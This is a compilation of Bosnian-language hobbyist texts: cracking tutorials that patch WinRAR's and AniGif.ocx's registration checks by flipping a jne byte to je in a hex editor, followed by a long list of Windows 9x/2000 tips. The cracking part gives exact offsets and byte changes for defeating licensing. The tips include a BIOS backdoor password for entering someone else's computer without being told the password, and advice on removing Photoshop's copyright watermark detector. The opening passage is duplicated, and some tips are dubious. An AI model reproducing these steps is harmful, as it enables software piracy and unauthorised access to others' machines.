Sad pritisnite dugme blizu "print" pod nazivom "strn ref" Pojavi ce se prozor.Sad cete moci vidjeti sve error poruke koje se mogu pojaviti od exe fajla.Mozete li se sjetiti sta je WinRar rekao kad ste ukucali pogresan registracijski cod?Rekao je "registration failed" (REGISTRACIJA PROPALA) Sad gledaj text i trazi tu poruku.Kada je nadjete dupli klik na nju.Pojavice se isto onaj prozor kojeg ste dobili kada ste ukucali pogresan registracijski cod. Ako ste sve ispravno uradili dobicete na ekranu ovo: :00413A8F 6A6A push 0000006A :00413A91 E863640000 call 00419EF9 :00413A96 59 pop ecx :00413A97 50 push eax :00413A98 FF7508 push [ebp+08] *ReferenceTo:USER32.MessageBoxA,Ord:0000h | :00413A9B E8120B0100 Call 004245B2 :00413AA0 33C0 xor eax, eax :00413AA2 A358674200 mov dword ptr [00425758], eax :00413AA7 A338564200 mov dword ptr [00425638], eax :00413AAC A34C564200 mov dword ptr [0042564C], eax :00413AB1 EB56 jmp 00413B09 * Referenced by a (U)nconditional or (C)onditional Jump at Adress: <---------Ovaj je nas |:00413A82(C) | * P o s s i b l e S t r i n g D a t a R e f f r o m D a t a O b j - > " Wi n R A R " :00413AB3 68D86A4200 push 00426AD8 :00413AB8 FF359C644200 push dword ptr [0042649C] * R e f e r e n c e T o : U S E R 3 2 . S e t Wi n d o wT e x t A , O r d : 0 0 0 0h :00413ABE E86B0A0100 Call 0042452E *PossibleReferencetoStringResourceID=00048 :"normal" :00413AC3 6A30 push 00000030 *PossibleReferencetoDialog:ARCINFODLG,CONT ROL_ID:006C,"" Asm code ide od vrha na prema dole sve dok ne naidje na kraj coda ili gresku u codu.To znaci da jne/je komandu moramo promijeniti koja je negdje gore. Ali kako cemo znati koja je? Sad mozemo pokusati promijeniti svaku i

vidjeti ili mozemo upotrijebiti "Goto Cd loc" dugme koje se nalazi na vrhu.Kada kliknemo na njega mali prozor ce se pojaviti.Na desnoj strani prozora ce se pojaviti text box "Code offset (HEX)" Sada bacimo pogled na asm-code.Vidjecemo liniju "* Referenced by a (U)nconditional ili (C)onditional Jump At Adress:" linija pored,na njoj se nalazi adresa koju moramo znati "|:00413A82 (C)" To je broj koji moramo staviti u cod lokacijski prozor 00413A82.Na ovoj adresi cemo pronaci "jump" skok koji ce slati svaki put error poruki kada ukucamo pogresan cod.Kliknite na Ok u cod lokacijskom prozoru. Sad smo opet negdje u asm-codu.Bar je na liniji koja nam dopusta da skacemo na poruke.To je jne (jump if not equal).Bar ce promijeniti svoju boju u zeleno.Sada pogledaj na kraj ekrana.Tu je linija koja izgleda kao: 34985 Pg 467 of 998 Code Data @:00413A82@Offset00013082h u Fajlu:Winrar95.w32 Jedna stvar koju moramo zapamtiti je broj poslje @offset.To je 00013082. Sada idi na HIEW (netrebas zatvarati W32Dasm89) pod HIEW-om otvori WinRAR95.exe.Klikni na F4 i poslje toga izaberi "decode".Sada mozemo vidjeti sve te jne/je/eax .. komande i klikni F5.Na vrhi lijevom cosku mozes staviti @offset broj. Sad klikni F3.Sad smo u mogucnosti da promijenimo vrijednosti. Promijeni od 75(jne) na 74 (je) i klikni na F9.Onda klikni F10. Promijenili smo vrijednosti jne. Sada mozemo isprobati da li radi.Pokrenucemo program otici do registration ukucati bilo kakav cod ili ime i sta ce biti? Pojavice se prozor koji ce vam reci da je registracija uspjesna. Zapamtite ako zelimo manipulisati exe fajlovima ka Winrar moramo ga zatvoriti na Windows desktopu ili cemo dobiti poruku "error only read mode" Zpamtite osnove.Ako hocemo da cracknemo igru ili aplikaciju pocnite i uvijek gledajte koje vrste error poruke dobijate.Ako je Windows messege box mocete je cracknuti sa W32Dasm.Ako je neka druga vrsta error poruke bolje je da crackirate sa soft-ice debugger-om. text by CraX0r Uvod u Svijet Cracking-a by CraX0r BIHNET SECURITY mad_chroniceia@yahoo.com Uvod: Sta je Cracking? Cracking je jedna vrsta expresije.Ako hoces crack-ovati mozes uvidjeti da nije lako razumijeti ispocetka neke osnovne tocke crackinga ali nakon sto ih razumis imaces potrebno znanje i iskustvo za daljnje usavrsavanje crackinga. Ovaj text ce objasniti neke osnovne tacke crackinga,nadam se da cete razumijeti nacin na koji cu neke tacke objasniti. Korak 1: Ovaj text je napravljen za sve pocetnike na netu koji nerazumiju ili

neznaju nista o ASM-Codu ili o internalnoj funkciji aplikacije. Potrebni Software: Za pocetak jedino sto ce nam trebati je W32Dasm8.9 (Windows disassembler) i HIEW (to je jedan od boljih Hex-Editora mislim da je najbolji za pocetak).To je sve za pocetak. Sad malo znanja: Kao sto mozda znate nije lako rukovati sa svim tim asm-codovima i mislim da mnogi neznaju puno o njima,tako da cu obajsniti najpotrebnije komande. Moramo znati da svaka dva broja u asm-codu predstavljaju jedan bajt (byte). Broj 73536357 =4 bajta (bytes).75 je jedan bajt (byte) 43 je jedan bajt i 45 je jedan bajt.Sad imamo 4bajta.Ako zelimo da ih promjenimo kasnije znamo da trebamo promijeniti uvijek dva brooja sa dva druga broja. Sad par stvari o brojevima koje ces vidjeti kada disassemble exe. fajl. je (hexadecimala je 74) = jump if equal (skoci ako je jednak) jne (hexadecimala je 75) = jump if not equal (skoci ako nije jednak) nop (hexadecimala je 90) =no operation (nema operacija) call (nema hexadecimale) = call a operation (poziva operaciju) jmp (nema hexadecimale) = jump to string/operation (skok na operciju) Ovih pet stvari ce nam trebati za pocetak. Ok sad cemo pogledati sta oni zapravo rade u asm-codu. je (jump if equal) skace na neku od operacija ako nadje sta trazi. Primjer: Igra treba cd da bi se pokrenula. je "jump if equal" je komanda koja provjerava ima li cd-a u drive-u.cd je nadjen (equal) i nastavlja se dalje u asm-codu (jump if equal). jne (jump if not equal) Primjer: Igra treba cd da startuje. jne "jump if not equal" komanda provjerava da li je cd u drive-u.Ukoliko cd nije u drive-u dobijate poruku koja vas obavjestava da cd nije u cd drive-u. To je "jump if not equal" ili jne komanda. Nop (no operation) nop komanda ubija trenutnu operaciju kao naprimjer provjeravanje jel password validan. Call (call a operation) ova komanda poziva operaciju neku. jmp (jump to a string/operation) jmp komanda nepoziva komande nego skace na njih. Nesto o Zastitnim semama: Ima puno zastitnih stilova koje ces morati nauciti i nauciti kako ih provaliti. Imamo "normalne" cd zastite to jeste passwordom zasticene

programe,igre i vremenski ogranicene programe. Najlakse zastitne seme za nas su windows error poruke. U ovome textu cu pokazati kako da razbijemo windows message boxove i da crackujemo WinRar sa W32Dasm verzija 8.9 i sa HIEW-om. Pocinjemo sa Crackingom: Kao prvo pocecemo sa WinRAR-om. Otvorite program. Kao prvo sto mozemo vidjeti na vrhu prozora je "WinRar (unregistred version)" Sad cemo kliknuti na "Options" i poslje toga na "Register".Sad ce se pojaviti windows box.Sad stavite u prostor za text sta god hocete i kliknite na Ok.Sad ce se pojaviti drugi prozorcic koji ce vam reci da je registracija propala.To je sve sto moramo znati.Zatvori WinRar95 i idi na Ms-dos.Sad u Norton Commanderu napravi dvije kopije Winrara.Jedan nazovi WinRAR95.w32 (za W32Dasm89) a jednu nazovi WinRAR95.exx (sacuvana kopija ako promijenis pogresne bajtove) Sad startuj W32Dasm89 i idi na "open file to disassemble".Doci ce prozor i moci ces izabrati fajl koji hoces da disassembliras. Izabracemo WinRar95.w32. Sad W32Dasm pocinje disassembling proces. Kada je exe fajl disassembliran moze biti da necete vidjeti razumljive znakove nego WINDINGS pisane linije.Ako se ovo desi idite na"Dissassembler" pa na "font" I KAO ZADNJE "select font".Sad mozete izabrati font kojeg cete upotrebljavati u W32D.ASM89. Najbolji font je Arial.Sad cete vidjeti asm-code. Nece vam reci puno jer predpostavljam da neznate sta te sve komande znace. Sad pritisnite dugme blizu "print" pod nazivom "strn ref" Pojavi ce se prozor.Sad cete moci vidjeti sve error poruke koje se mogu pojaviti od exe fajla.Mozete li se sjetiti sta je WinRar rekao kad ste ukucali pogresan registracijski cod?Rekao je "registration failed" (REGISTRACIJA PROPALA) Sad gledaj text i trazi tu poruku.Kada je nadjete dupli klik na nju.Pojavice se isto onaj prozor kojeg ste dobili kada ste ukucali pogresan registracijski cod. Ako ste sve ispravno uradili dobicete na ekranu ovo: :00413A8F 6A6A push 0000006A :00413A91 E863640000 call 00419EF9 :00413A96 59 pop ecx :00413A97 50 push eax :00413A98 FF7508 push [ebp+08] *ReferenceTo:USER32.MessageBoxA,Ord:0000h | :00413A9B E8120B0100 Call 004245B2 :00413AA0 33C0 xor eax, eax :00413AA2 A358674200 mov dword ptr [00425758], eax :00413AA7 A338564200 mov dword ptr [00425638], eax :00413AAC A34C564200 mov dword ptr [0042564C], eax

:00413AB1 EB56 jmp 00413B09 * Referenced by a (U)nconditional or (C)onditional Jump at Adress: <---------Ovaj je nas |:00413A82(C) | * P o s s i b l e S t r i n g D a t a R e f f r o m D a t a O b j - > " Wi n R A R " :00413AB3 68D86A4200 push 00426AD8 :00413AB8 FF359C644200 push dword ptr [0042649C] * R e f e r e n c e T o : U S E R 3 2 . S e t Wi n d o wT e x t A , O r d : 0 0 0 0h :00413ABE E86B0A0100 Call 0042452E *PossibleReferencetoStringResourceID=00048 :"normal" :00413AC3 6A30 push 00000030 *PossibleReferencetoDialog:ARCINFODLG,CONT ROL_ID:006C,"" Asm code ide od vrha na prema dole sve dok ne naidje na kraj coda ili gresku u codu.To znaci da jne/je komandu moramo promijeniti koja je negdje gore. Ali kako cemo znati koja je? Sad mozemo pokusati promijeniti svaku i vidjeti ili mozemo upotrijebiti "Goto Cd loc" dugme koje se nalazi na vrhu.Kada kliknemo na njega mali prozor ce se pojaviti.Na desnoj strani prozora ce se pojaviti text box "Code offset (HEX)" Sada bacimo pogled na asm-code.Vidjecemo liniju "* Referenced by a (U)nconditional ili (C)onditional Jump At Adress:" linija pored,na njoj se nalazi adresa koju moramo znati "|:00413A82 (C)" To je broj koji moramo staviti u cod lokacijski prozor 00413A82.Na ovoj adresi cemo pronaci "jump" skok koji ce slati svaki put error poruki kada ukucamo pogresan cod.Kliknite na Ok u cod lokacijskom prozoru. Sad smo opet negdje u asm-codu.Bar je na liniji koja nam dopusta da skacemo na poruke.To je jne (jump if not equal).Bar ce promijeniti svoju boju u zeleno.Sada pogledaj na kraj ekrana.Tu je linija koja izgleda kao: 34985 Pg 467 of 998 Code Data @:00413A82@Offset00013082h u Fajlu:Winrar95.w32 Jedna stvar koju moramo zapamtiti je broj poslje @offset.To je 00013082. Sada idi na HIEW (netrebas zatvarati W32Dasm89) pod HIEW-om otvori WinRAR95.exe.Klikni na F4 i poslje toga izaberi "decode".Sada mozemo vidjeti sve te jne/je/eax .. komande i klikni F5.Na vrhi lijevom cosku mozes staviti @offset broj. Sad klikni F3.Sad smo u mogucnosti da promijenimo vrijednosti. Promijeni od 75(jne) na 74 (je) i klikni na F9.Onda klikni F10.

Promijenili smo vrijednosti jne. Sada mozemo isprobati da li radi.Pokrenucemo program otici do registration ukucati bilo kakav cod ili ime i sta ce biti? Pojavice se prozor koji ce vam reci da je registracija uspjesna. Zapamtite ako zelimo manipulisati exe fajlovima ka Winrar moramo ga zatvoriti na Windows desktopu ili cemo dobiti poruku "error only read mode"

*-*-*-*-*-*-*-*-*-*-*--- Cracking I dio --*-*-*-*-*-*-*-**-*-*

* Prije nego sto pocnete citati ovaj text, trebate skinuti 2 programa sa nhs-ac sajta /Cracking/ i to W32 Dasm i Hex Editor. E takodjer bi trebali da znate neke osnovne komande i zasta ti programi sluze. Zato lijepo fino skoknite do NHS-AC sajta i procitajte o tome. E ako ste sve procitali i shvatili sta uopce zelite, mozemo poceti. * AniGif.ocx Naime, u ovom tutoru cemo cracknuti jedan fajl koji se nalazi u Visual Basic-u 6. (Samo da znate da sam sve testirao i da sam ja cracknuo, zato slobodno mozete nesto pitat ako vam nije jasno). Fajl se zove AniGif.ocx i nalazi se u Windows\System direktoriju. Taj fajl sluzi za ubacivanje GIF animacija u VB6. Medjutim, da bi to mogli morate se registrovat. Ali mi zelimo to cracknut. Nije problem, naucit cete :)) Znaci, moramo nekako "ukinut" registraciju. Ako ste pripremili W32 Dasm, pokrenite ga i ucitajte fajl AniGif.ocx. Vec sam rekao gdje se nalazi i za svaki slucaj napravite kopiju tog fajla. Sada idemo na crack! * Cracking Kada ste ucitali fajl u W32 Dasm, trebate uraditi sljedece. E ako u VB6 pokusamo ubaciti GIF animaciju, prvo se moramo registrovat kao sto sam rekao. Medjutim ako upisemo pogresan serijski broj, pokazat ce se poruka: "The registration info is incorrect." E sada tu poruku moramo naci u W32 Dasm-u. Idite na opciju "Stn REF" pogledajte ove male icone gore na vrhu. E to je druga icona sa desne strane. Kliknite na nju. Zatim nadjite onu poruku koju smo malo prije vidjeli. E kada ste je nasli kliknite na nju. Zatim cemo doci do tog dijela coda. Mi cemo biti na liniji: :10017320 68BC0A0210 push 1002ABC.

E sada pritisnite tipku PageUp 6 puta! Onda pogledajte 2 reda iznad i vidjece te ovaj code: *Referenced by a (U)nconditional or (C)onditional Jump at Address: :1001715C(C) Sada moramo otici do jedne lokacije. Ako ste procitali Cracking na nhs-ac sajtu onda znate sta treba. Ali ja cu opet pojasnit. Trebate otici do ove adrese: 1001715C Pritisnite tipku Shift-12 i upisite: 1001715C Zatim cete biti prebaceni na ovoj liniji: :1001715C 7568 jne 100172C6

*-*-*-*-*-*-*--- Cracking II dio --*-*-*-*-*-*-** Ovo je nastavak od I dijela. Znaci, mi smo nasli adresu koju moramo promijenit. To je ona adresa koju ste zapisali. :1001715C 7568 jne 100172C6 Sada (prvo izadjite iz W32 Dasm) i pokrenite Hex Editor. Ucitajte onaj isti fajl. Zatim pritisnite tipku F4 i idite na "Decode". Sada trebate ici na lokaciju :1001715C Pritisnite F5 i prvo unesite . pa ovaj broj. To bi izgledalo ovako: .1001715C E kada ste dosli na tu lokaciju, trebate ono JNE promijeniti u JE. Pritisnite F3 i broj 75 promijenite u 74. Znaci ako ste to uradili, ovako bi trebalo da izgleda: :1001715C 7468 je 100172C6 Pritisnite tipku F9 i izadjite iz programa (ESC ili F10). Brraaavvvvooooooo! Upravo ste cracknuli svoj prvi program. Cestitam. Sada pokrenite VB6, uzmite komponentu "GIF animation" i naravno, sada ce biti: Unregister :))))))))) Sada mozete ubacivati svoje GIF animacije :))

------------------------------------------------------------------

*-*-*-*-*--- Windows trikovi ---*-*-*-*-**-*-*-*-*-*

Sada pocnimo sa windows trikovima...jos jedan odlican tutor koji sam pokusao da odjednom u cugu napisem ali mi se nije dalo...pa sam ga pisao 2 dana tako sto sam ga sacuvao Save As My documents Windows trikovi...Stvarno ima puno windows trikova i vjerujem da ce mi za vrijeme pisanja ovog doca stalno govoriti nema enough memory traj lejter itd. itd. (Nadam se da ste primjetili kako mi je dobar engleski). U nastavku slijedi jos Windows trikova iako ovaj gore nije licio windows triku, al et...sta je tu je... Da li ste znali da mozete da stavljate pozadinu kada udjete u svoj omiljeni direktorij? Pa mozete, idite na View &gt; Customize this Folder... i tamo koristite min znanje engleskog... ovaj trik je lakse radjenje Refresha web stranice, tj. pritiskanje F5 da biste Refresh web stranicu. Huh...trebao sam staviti naziv Kompjuterski trikovi... Da li ste znali? Da mozete da ukucate rijec u Adres baru i pritiskajuci CTRL+ENTER kompjuter automatski dodaje http://www.com na tu Vasu rijec. Da otprintate trenutnu stranicu pritisnite CTRL+P Da trazite nesto putem adres bara ukucajte go, find ili ? i onda rijec koju zelite naci... Ako zelite da izvucete maksimum iz svog racunara, a vi to neizmerno zelite, cak sta vise treptite za tim trenutkom, pokusajte provesti u delo sledecih par saveta: a) Desni klik na prazan prostor na desktopu i odaberete Properties. Kliknite na Effects i iskljucite sve opcije koje se nalaze pod Visual effects. Ovim postupkom ubrzali ste otvaranje menija, pomeranje prozora, i jos neke druge stvari. b) Redovno koristite alat za defragmentaciju diska. Nalazi se u Start&gt;Programs-&gt;Accessories-&gt;System Tolls-&gt;Disk defragmenter. Redovnim odrzavanjem diska mozete povecati performanse kompjutera do 10%.

Kako pristupiti CD-ROM-u u Safe modu? Pre nego sto PC pocne da bootujeWindows drzite CTRL ili F8 da bi ste pristupili Start meniju. Izaberite Command Prompt Only i otkucajte 'win/d:m' (bez apostrofa), potvrdite sve sa ENTER. Jedna od stvari koja moze uzrokovati probleme, narocito na racunarima sa slabijim grafickim karticama je i kolicina boja sa kojima se vrsi prikaz slike na monitoru. Preporuka je da ne povecavate kolicinu boja iznad 16 bitne jer ionako necete primetiti razliku (osim ako se ne bavite grafickim dizajnom) izmedju 16 bitne i 32 bitne kolicine boja, a vasa graficka kartica bice vam zahvalna i radice sa puno manje napora. Pojavio vam se virus. Jedna od najlaksih promena sistema na viruse trojance je da u DOS Prompt-u otkucate netstat-a. Ako u momentu izvrsenja ove naredbe racunar nije povezan na Internet dobicete prikaz svih otvorenih port-ova i informaciju da li postoji neki otvoreni port koji ima status Listening. Ako je broj port-a ispod 1024, velika je verovatnoca da se radi o nekom sistemskom servisu. Medjutim, ako je broj port-a koji se prisluskuje iznad 1024 proverite sistem sa nekim antivirusnim programom. Mislim da svako zna za igricu FreeCell koja dolazi uz Windows. Koliko puta vam se desilo da poludite i vise nego ista pozelite da pobedite pa makar i na prevaru. Ako pritisnete kombinaciju tastera CTRL+SHIFT+F10 tokom igre, dobicete meni gde ce vas racunar upitati da li zelite da pobedite, izgubite ili nastavite da igrate. Ako ste zaboravili BIOS sifru ili treba da radite sa prijateljevim racunarom i iz visih i neobjasnjivih razloga morate da cacnete nesto po njegovoj masini, a on vam (zloca jedna) nije rekao sifru ucinite sledece. Restartujte racunar sa ukljucenim CAPS LOCK-om. Drzeci Shift taster otkucajte AWARD-SW Ovo bi trebalo da vam obezbedi ulaz na sve racunare koji koriste AWARD BIOS.

Koji je dobar nacin da se zastitite od virusa kada vec nemate neki antivirus program? Idite na Start/Find i nadjite sve fajlove sa ekstenzijom EXE i DLL. Selektujte ih, kliknite desnim dugmetom na njih i izaberite Properties. Pod Attributes selektujte Read-only i onda na OK. Od sada se fajlovi sa ekstenzijom EXE i DLL, koji su inace meta virusa, ne mogu menjati posto se oni, od sada, samo mogu citati ( Read-only). Ovakva vrsta zastite predstavlja problem za update programe tako da pre nego sto update-ujete morate iskljuciti Read-only. Svi znamo da CTRL+A selektuje ceo tekst. Znate li da mozete u MS Wordu da selektujete sa F8? Pritisnite F8 jedanput da bi ukljucili ovu mogucnost. Stavite kursor negde na tekst. Pritinsite ponovo F8 i selektovace se cela rec. Treci put selektovace se cela recenica, cetvrti put paragraf a peti put ceo dokument. Obrnuti proces sa SHIFT.

Kada zatvorite neku aplikaciju neke biblioteke(DLL) i dalje ostaju ucitane u memoriji iako ne sluze nicemu. Da bi ste ustedeli memoriju uradite sledece. Startujte Regedit pa idite do HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Explorer i napravite novi String Value sa imenom AlwaysUnloadDll i dodelite mu vrednost 1. Restartujte Windows i uzivajte u cistoj memoriji. Napomena: ovaj trik bi trebalo da koriste samo oni ljudi koji koriste obilje razlicitih programa svakodnevno. Onim ostalim ne bih preporucio ovaj trik jer ce usporiti ucitavanje programa jer ce se biblioteke svaki put ponovo ucitavati. Da li vam se desava da ScanDisk posle desetak sekundi pocne ponovo sve ispocetka da radi? Najbolje resenje je da startujete ScanDisk sa Windows 98 boot diskete jer tada nema ovakvih simptoma. Takodje, treba da proverite scandisk.ini koji se nalazi u Windows \ Command folderu. Namestite NumPasses vrednost na 5 a ScanTimeOut treba da bude na ON. Ukoliko zelite da u MS Wordu selektujete samo onaj tekst koji se nalazi u zamisljenom pravougaoniku kojeg vi definisete, pritisnite zajedno CTRL+ALT+SHIFT i drzeci levi taster misa opisite granice pravougaonika. Ovo vam daje mogucnost selektovanja kao u npr. Photoshopu. Kako preimenovati ikonu Recycle Bin? Startujte Regedit i idite do HKEY_LOCAL_MACHINE \ Software \ Classes \ CLSID\{645FF040-5081101B-9F08 -00AA002F954E} \ ShellFolder. Kliknite dvaaput na 'Attributes' i promenite broj u 50010020. Nakon ovoga dobicete u meniju komandu Rename Neki DOS programi kada se startuju iz Explorera samo otvore prozor DOS prompta i u nedostatku parametra odmah zatvore prozor tako da vi ne znate sta je pisalo. Jedini lek je da sami odete u DOS prompt i da otkucate putanju do fajla i onda da ga direktno startujete. Medjutim, taj odlazak u spomenuti direktorijum moze biti prilicno zamoran jer DOS skracuje imena direktorijuma i fajlova npr. na C:\PROGRA~1\SISOFT~1\SPEEDI~1.EXE. Zbog toga je mnogo lakse da principom Drag&amp;Drop prevucete fajl iz Explorera u DOS prompt i odmah dobijete kompletnu putanju do fajla i sve sto vam ostaje je da pritisnete ENTER. Windows povremeno javlja keyboard overflow problem u keyboard baferu ili jednostavno cujete pistanje na dodir tastature. Povecajte buffer tako sto cete otici do HKEY_ LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ Kbdclass\Parameters i napravite DWORD value sa imenom KeyboardDataQueueSize. Vrednost povecajte npr. na 64 hex Neko vam stalno menja pozadinu Windowsa i to vas nervira? Resenje je da startujete Regedit i odete do HKEY_ CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System. Napravite

DWORD value: "NoDispBackgroundPage" (bez navodnika) i dodelite mu vrednost 1. Od sada Background opcija u Display Propertiesu nece biti dostupna. Kako na najlaksi nacin napraviti svoj Screen Saver? Desno dugme na Desktop pa Properties i onda na Screen Saver. Izaberite '3D Flying Objects'. Kliknite na Settings pa pod Style odaberite 'Textured Flag'. Kliknite na 'Texture' i locirajte bilo koju BMP sliku (koja moze biti i npr. logo vase firme). Otkacite 'Smooth shading' stavite 'Resolution' i 'Size' na MAX. Kliknite na OK pa na Preview da vidite sta ste uradili Znate li za opciju Combine and Decode u Outlook Expressu? Selektujte vise poruka drzeci CRTL ili SHIFT i idite do Message menija i stavke 'Combine and Decode...'. Dobicte od svih selektovanih poruka jednu veliku poruku koju npr. mozete da stampate ili nesto slicno. Ukoliko zelite da startujete starije programe koji nisu pisani za Windows 2000 pogledajte 'Application Compatibility tool' kojeg mozete pronaci na instalacionom CDu Windowsa 2000 u folderu Support pod nazivom APCOMPAT.EXE. Ovo vam dodje kao neki emulator Windowsa 95/98 pod 2K U Windowsu 2000 Profesional Add/Remove stavka vise na sadrzi onoliko Windows komponeneti, kao pre, koje se mogu deinstalirati. Ima i zato leka! Skoknite do INF foldera i otvorite SYSOC.INF fajl u Notepadu. Izbrisete rec HIDE ispred svake stavke i snimite. Od sada Windows "igra otvorenih karata". Ukoliko zelite da na najlaksi nacin, bez upotrebe raznih shareware-ova, prevedete IP broj (npr. 245.84.120.19) u nesto razumljivo i pamtljivo, idite u DOS i otkucajte NSLOOKUP [IP] ActiveX plug-inovi mogu biti korisni ali mogu i da zasmetaju. Problem kod njih je da se ne mogu jednostavno deinstalirati iz Add/Remove apleta nego jedino rucno. Idite do Windows/ Downloaded Program Files foldera gde cete naci sve ActiveX plug-inove koje imate instalirane. Ukoliko neki ne zelite vise na vasem sistemu, kliknite desnim dugmetom na njega i izaberite Remove. ALI, budite jako pazljivi i radite ovo samo ako 100% znate sta uklanjate i zasto. Korisnici Photoshopa od verzije 5 su primetili da prilikom otvaranja svakog fajla Photoshop odradi 'Detect watermark' koji sluzi nekoj vrsti zastiti copyrighta. Ukoliko vas nije briga za copyright neke slike ili samo zelite da ubrzate ucitavanje slike za par sekundi, skoknite do foldera gde je instaliran Photoshop pa onda udjite u Plugin folder. Sve sto treba da uradite je da obrisete folder Digimarc ili jos bolje da ga prebacite u neki drugi folder ukoliko vam kasnije zatreba. Kako ubrzati startovanje programa? Startujte ga kao 'Minimized'. Windows nece morati da renderuje prozor i njegov sadrzaj pa ce program biti brze u statusu 'ready to use'. Medjutim, nemojte ocekivati da ovom metodom sacuvate memorijske resurse - samo skracujete

brzinu ucitavanja. Ovo je veoma zgodno za programe koji se startuju sa Windowsom. Budite obazrivi da kada saljete e-mail, fajl koji ste prikacili (attachment) povecava se za oko 30% a to nije malo. Treba voditi racuna da kada narucujete fajlove na email, preko npr. emailfile.com, treba da dodate ovih 30% na originalnu velicinu fajla. Personal Mailbox na EUnetu je 4MB sto ce reci da max velicina fajla koji moze da vam stigne je oko 3000KB. Kada sistem pocne sporo da reaguje i sve vam se cini da ce uskoro da padne, a sebi ne mozete da dozvolite da restartujete sistem uradite sledece. Pritisnite CTRL+ALT+DEL, oznacite Explorer i kliknite END TASK dugme. Dobicete poruku "Are you sure you want to exit windows?" a vi pritisnete ESC i sacekajte par sekundi do sledece poruke "Explorer is not responding". Kliknite na END TASK i Desktop ce se osveziti. Windows bi trebao da reaguje bolje jer je ovo neka vrsta pseudo reboota. Kako pronaci uzrok pada odredjenog programa. Resenje se moze potraziti sa Dr.Watsonom kojeg dobijate sa Windowsom. Procedura je u tome da startujete Dr.Watsona i dovedete problematicni program u stanje pada. Dr.Watson ce to uredno registrovati i snimiti stanje celokupnog stanja hardvera, softvera, drajvera i operativnog sistema a na vama je da na osnovu vaseg znanja tumacite log file i zakljucite sta se desilo. Kako u Microsoft Wordu napraviti tabelu bez upotrebe misa na najlasi nacin? Otkucajte samo '+-+' (bez navodnika) i pritisnite ENTER. Eto tabele! Ukoliko zelite tabelu sa npr. cetiri celije otkucajte '+-++++' (bez navodnika). Ukoliko zelite da na najbrzi nacin dodate razmak u meniju Outlook Expressa 5, dovoljno je samo da drzite SHIFT i da kliknete levim dugmetom misa na ikonu izpred koje zelite razmak. Koliko ste puta u browseru videli gresku 404-File not found? Ukoliko vam je zaista stalo da vidite tu stranicu, stavite URL u clipboard i idite na sajt http://www.google.com/ i pod pretragom Pastujte problematicni URL. Google ce pronaci sajt a na vama je da kliknete na Cached link gde cete videti taj URL iz Googleovog kesa. Recimo da je vam je folder My Documents najposeceniji folder na hard disku i recimo da cesto koristite Wordpad. Kliknte desnim dugmetom na ikonu Worpada i pod Start In otkucajte C:\My Documents. Od sada svaki put kada otvarate neki fajl u Wordpadu Dialog box ce vas odvesti direktno u My Documents folder. Sa Windowsom 98 SE dolazi mali utility sa kojim mozete da editujete i menjate vremenske zone. Mozete ga naci na instalacionom CDu u folderu Tools\Reskit\Config\tzedit.exe Zelite li browser bez ivica? Otkucajte pod RUN "iexplore -k

javascript: moveTo(100,100); resizeTo(500,400)" i dobicete Internet Explorer koji nema ni jednu ivicu...Ivicu? U triku 240 je spominjana komanda FC koja uporredjuje dva fajla i izbacuje rezultat u okviru teksta sa promenama. Korisnici Windowsa 98/2000 slican program, ali sada u Windows verziji, mogu naci na instalacionom CDu za ovaj operativni sistem. Lokacija za W98 je Tools \ Reskit \ Files a za W2000 Support \ Tools folder\SUPPORT.CAB. Startujte fajl WINDIFF.EXE Kako pronaci sliku na internetu koja se zove npr. FOTKA? Uz Alta Vistu sve je moguce. Dovoljno je da u search fieldu otkucate 'image:fotka' Doslo je vreme prvom triku za Windows ME. Kada neki program 'pukne' obicno kliknete na Details u nadi da cete saznati sta je prouzrokovalo pad programa. Medjutim, ljudi iz MSa su se odlucili da ukinu dugme Details iz ko zna kojih razloga, ali kombinacija tastera ALT+D dace vam ono sto ste vec navikli da vidite - detalje. Kako saznati koliko puta ste startovali neki program ili igru? Dovoljno je samo da pogledate fajl 'OPTLOG.TXT' i sve sto ste dosad startovali videcete upisano i odbrojano. Inace, ovaj fajl koristi MS Scan Disk da bi fajlove koje najcesce koristite stavio na pocetak diska jer ce tada biti brze procitani. Da li zelite da saznate sta se promenilo u Registry-ju posle instalacije neke aplikacije? Pre nego sto bilo sta pocnete da instalirate startujte Regedit i odaberite opciju 'Export Registry File' i nazovite ga 'pre.reg'. Instalirajte sta ste vec naumili pa ponovo odaberite opciju za Export ali ga ovaj put nazovite 'posle.reg'. Idite na Start/Run i otkucajte "fc pre.reg posle.reg &gt; promene.txt" (sa navodnicima). Stara dobra DOS komanda FC radi i u Windowsu i uporedice ova dva fajla i promene napisati u fajlu 'promene.txt' Da li su vas ikada nervirali fontovi na nekim web stranama? Negde su isuvise mali, negde su veliki, negde su cudne boje a negde necitljivi. Ukoliko zelite da premostite formatizovanje fontova u IE idite do Internet Options/Accessibility i tamo zavrsite posao. Interesuje vas sa kojim je sve sajtovima neki sajt linkovan? Otkucajte u Alta Visti npr. 'link:formula1.com' i videcete sve linkove koji poticu sa sajta formula1.com Kako na internetu pretrazivati URL adrese? Ukoliko vas npr. zanimaju sve web adrese u cijem se URLu pominje rec 'phone' dovoljno je da na Alta Visiti otkucate upit 'url:phone' Na Unixu vec odavno postoji opcija da kada misem predjete preko neaktivnog prozora on postaje aktivan. Ukoliko to zelite i u Windowsu evo sta treba da uradite. Sa Regeditom idite do HKEY_CURRENT_USER\Control Panel\Mouse, napravite DWORD stavku sa imenom ActiveWindowTracking, dodelite mu vrednost 1 i restartujte

sistem Evo par switcheva za Scan disk. Moze ti ih koristiti sa npr. Run komandom iz Start menija. 'SCANDSKW /A' ce izvrsiti auto-selekciju vaseg harda, 'SCANDSKW /N' ce poceti scan bez nepotrebnih pitanja, 'SCANDSKW /P' ukljucuje preview mod a 'SCANDSKW /SILENT' ukljucuje silent mod u kojem nemate mogucnost biranja opcija. Koristite li Telnet u Windowsu? Zelite li Smooth Scrolling. Idite do HKEY_CURRENT_USER \ Software \ Microsoft \ Telnet i promenite vrednost stavke "SmoothScroll" u 1. Koja je najbolja zastita protiv destruktivnih virusa koji npr. formatizuju hard disk bez znanja korisnika? To nije ni jedan od anti-virusnih programa. Dovoljno je da preimenujete fajl FORMAT.EXE u npr. FORMAT1.EXE. Ovo bi ste takodje mogli primeniti i na fajl FDISK.EXE Zelite li da promenite prioritet vaseg CPU-a? Idite do HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \VxD \ BIOS i u desnom panelu napravite DWORD stavku sa imenom "CPUPriority". Dodelite mu vrednost 1 u decimalnom formatu i rebutujte. Programi i ceo sistem 